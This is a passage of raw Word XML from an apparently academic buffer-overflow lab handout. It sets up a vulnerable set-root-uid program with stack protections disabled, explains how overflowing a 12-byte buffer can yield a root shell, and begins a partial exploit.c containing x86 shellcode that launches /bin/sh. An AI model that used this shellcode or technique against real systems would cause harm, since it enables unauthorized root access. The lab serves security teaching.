          <w:w w:val="95"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>non-executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>protections):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="421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su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="683"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>Password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(enter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root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password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="22"/>
        <w:ind w:left="421" w:right="220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gcc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-o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stack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-z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execstack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-fno-stack-protector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stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>chmod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4755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stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="248" w:lineRule="exact"/>
        <w:ind w:left="42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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>The above program has a buffer overflow vulnerability. It first reads an input from a file called “badfile”,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8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>then</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>passes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input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another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>buffer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>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>bof()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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input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maximum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>length of 517 bytes, but the buffer in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>bof() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>has only 12 bytes long.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>strcpy() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>does not check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>boundaries, buffer overflow will occur. Since this program is a set-root-uid program, if a normal user can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit this buffer overflow vulnerability, the normal user might be able to get a root shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It should be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>noted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gets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called</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>“badfile”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This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users’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>control.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Now,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52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contents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“badfile”, such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vulnerable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copies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contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>into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buffer,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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell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spawned.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52" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="437"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>For Instructor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>To test whether students really know how to conduct the attack, during the demo time,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ask students to change the buffer size from 12 to another number in the vulnerable program </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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really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attack,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modify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attacking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launch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attack.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1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Exploiting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Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We provide you with a partially completed exploit code called “exploit.c”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The goal of this code is to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>construct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>contents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“badfile”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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code,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shellcode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you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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develop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rest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="121"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="225" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="626"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>program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that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creates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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>file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containing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>code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8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>launching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shell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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="25"/>
        <w:ind w:left="160" w:right="7306"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>#include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&lt;string.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>char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shellcode[]=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="261" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="700" w:footer="0" w:top="1280" w:bottom="280" w:left="1280" w:right="1000"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="2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2487"/>
        <w:gridCol w:w="1047"/>
        <w:gridCol w:w="916"/>
        <w:gridCol w:w="2421"/>
        <w:gridCol w:w="1096"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="268" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="377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87" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="196"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x31\xc0"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="160" w:lineRule="auto" w:before="39"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="66"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>xorl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="197"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%eax,%eax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="160" w:lineRule="auto" w:before="39"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x50"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%eax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x68""//sh"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>$0x68732f2f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x68""/bin"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>$0x6e69622f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x89\xe3"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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movl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%esp,%ebx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x50"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%eax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x53"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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pushl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%ebx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
